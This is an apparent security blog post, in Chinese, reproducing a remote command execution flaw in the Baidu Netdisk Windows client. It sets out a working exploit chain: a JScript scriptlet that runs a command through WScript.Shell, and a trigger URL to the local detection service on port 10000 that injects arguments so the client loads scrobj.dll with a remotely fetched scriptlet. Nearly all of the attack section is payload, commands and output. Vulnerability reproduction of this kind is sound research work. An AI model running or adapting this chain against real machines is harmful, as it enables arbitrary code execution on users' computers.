n0o0b's blog

large picture of the cover

某网盘Windows客户端远程命令执行漏洞复现

百度网盘7.59.5.104以下版本,存在命令执行漏洞

下载地址https://136892-1793258927.antpcdn.com:19001/b/pkg-ant.baidu.com/issue/netdisk/yunguanjia/BaiduNetdisk_7.59.5.104.exe

YunDetectService.exe默认开机自启,无需登录,会在10000端口监听,若被挤占则+1顺延

C:\Users\admin>netstat -ano|findstr 10000
  TCP    127.0.0.1:10000        0.0.0.0:0              LISTENING       11892

C:\Users\admin>tasklist|findstr 11892
YunDetectService.exe         11892 Console                    1     17,740 K

poc.xml,用于远程加载,这里方便直接python -m http.server开在本地

<?xml version="1.0"?>
<scriptlet>
  <registration
    progid="poc"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
      <![CDATA[
        var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c calc.exe");
      ]]>
    </script>
  </registration>
</scriptlet>

触发

https://127.0.0.1:10000/?method=OpenSafeBox&uk=n0o0b -install regdll "C:\Windows\System32\scrobj.dll\" /u /i:http://127.0.0.1:8000/poc.xml "..\..\..\..\..\..\..\..\Users\admin\AppData\Roaming\baidu\BaiduNetdisk"

image-20250904200219797

实际执行

"C:\Users\admin\AppData\Roaming\baidu\BaiduNetdisk\BaiduNetdisk.exe" -opensafebox -userkey n0o0b -install regdll "C:\Windows\System32\scrobj.dll\" /u /i:http://127.0.0.1:8000/poc.xml "..\..\..\..\..\..\..\..\Users\admin\AppData\Roaming\baidu\BaiduNetdisk"

image-20250904193851755

其中会触发defender告警

  • 命令执行行为

image-20250904181512741

  • 下载文件,恶意内容加载

image-20250904200509024

site logo

Welcome 2 n0o0b's home

© 2025 n0o0b's blog